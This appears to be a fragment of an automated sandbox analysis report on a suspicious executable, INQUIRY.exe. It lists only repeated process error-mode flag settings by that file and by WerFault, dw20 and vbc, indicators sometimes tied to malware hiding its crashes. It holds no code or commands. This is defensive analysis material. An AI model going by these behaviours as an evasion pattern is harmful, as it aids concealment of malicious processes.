                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOX
